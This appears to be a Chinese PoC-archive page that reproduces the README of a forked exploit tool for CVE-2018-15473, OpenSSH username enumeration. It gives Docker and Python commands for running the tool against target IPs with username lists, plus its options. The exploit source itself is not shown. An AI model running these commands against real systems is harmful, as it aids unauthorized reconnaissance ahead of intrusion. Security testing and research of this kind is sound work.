关联漏洞
标题:
OpenSSH 竞争条件问题漏洞
(CVE-2018-15473)
描述:OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中,并发代码需要互斥地访问共享资源时,对于并发访问的处理不当。
描述
Exploit Code for CVE-2018-15473
介绍
# CVE-2018-15473-Exploit
**Updated version with modern Python/Paramiko compatibility**
On August 15th, 2018, the following advisory was posted on the OSS-Security list: [http://openwall.com/lists/oss-security/2018/08/15/5](http://openwall.com/lists/oss-security/2018/08/15/5)
This is an improved version of the original exploit that works with modern Python environments and Paramiko versions (including 4.0.0+).
## 🚀 What's New in This Fork
- ✅ **Fixed Paramiko compatibility** - Works with Paramiko 4.0.0+ and modern Alpine Linux
- ✅ **Updated Dockerfile** - Uses Alpine packages instead of pip to avoid PEP 668 issues
- ✅ **Simplified exploit version** - `sshUsernameEnumExploit_simple.py` with better reliability
- ✅ **Improved error handling** - Better feedback and debugging information
- ✅ **Modern Python support** - Works with Python 3.10+ environments
## 📁 Repository Structure
```
CVE-2018-15473-Exploit/
├── Dockerfile # Updated for modern Alpine Linux
├── README.md # This file
├── sshUsernameEnumExploit.py # Original exploit (with compatibility fixes)
├── sshUsernameEnumExploit_simple.py # Simplified, more reliable version
└── test_users.txt # Sample username list for testing
```
## 🐳 Docker Usage (Recommended)
### Build the image:
```bash
docker build -t cve-2018-15473 .
```
### Run the exploit:
```bash
# Show help
docker run --rm cve-2018-15473 --help
# Test single username
docker run --rm cve-2018-15473 <target_ip> --username admin
# Test multiple usernames from file
docker run --rm -v /path/to/userlist.txt:/userlist.txt cve-2018-15473 <target_ip> --userList /userlist.txt
# Save results to file
docker run --rm -v /path/to/output:/output cve-2018-15473 <target_ip> --userList /userlist.txt --outputFile /output/results.json --outputFormat json
```
### Clean up:
```bash
# Remove containers and image
docker ps -a | awk '$2 == "cve-2018-15473" {print $1}' | xargs docker rm
docker rmi cve-2018-15473
```
## 🖥️ Local Usage
### Prerequisites
- Python 3.7+
- Paramiko library
### Installation
```bash
# Install paramiko
pip install paramiko
# Or use the simplified version (recommended for modern environments)
python3 sshUsernameEnumExploit_simple.py --help
```
## ⚙️ Features
The exploit includes the following features:
* **Threading** - Default 5 threads (configurable)
* If more than 10 are used, often the OpenSSH service gets overwhelmed and causes retries
* **Single username evaluation** via `--username` parameter
* **Multiple username evaluation** via `--userList` parameter
* **File output** via `--outputFile` parameter
* **Multiple output formats** (list, json, csv) via `--outputFormat` parameter
* **Configurable timeout** for connection handling
* **Improved error messages** and debugging information
## 📝 Usage Examples
### Single Username Test
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --username admin
```
### Multiple Usernames from File
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt
```
### JSON Output to File
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt --outputFile results.json --outputFormat json
```
### With Custom Threading and Timeout
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt --threads 3 --timeout 15
```
## 🎯 Target Requirements
This exploit targets:
- **Vulnerable versions**: OpenSSH < 7.7
- **Attack vector**: Username enumeration via timing attack
- **Protocol**: SSH (default port 22)
## ⚠️ Important Notes
1. **Legal Use Only**: This tool should only be used for authorized penetration testing and security research
2. **Rate Limiting**: Use appropriate threading limits to avoid overwhelming target services
3. **Patched Systems**: Modern OpenSSH versions (7.7+) are not vulnerable to this attack
4. **Network Considerations**: Ensure you have permission to test the target systems
## 🔄 Version Information
- **Original Author**: Justin Gardner, Penetration Tester @ SynerComm AssureIT
- **Original Repository**: [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit)
- **This Fork**: Updated for modern Python/Paramiko compatibility by [jubeenshah](https://github.com/jubeenshah)
- **Date**: August 20, 2018 (Original) / October 26, 2025 (Updated)
## 📄 License
This project maintains the same license as the original repository. Use responsibly and in accordance with applicable laws and regulations.
文件快照
[4.0K] /data/pocs/dde70b99426e5948b8f369c27797539c058e6c73
├── [ 373] Dockerfile
├── [4.5K] README.md
├── [ 11K] sshUsernameEnumExploit.py
├── [6.7K] sshUsernameEnumExploit_simple.py
└── [ 45] test_users.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。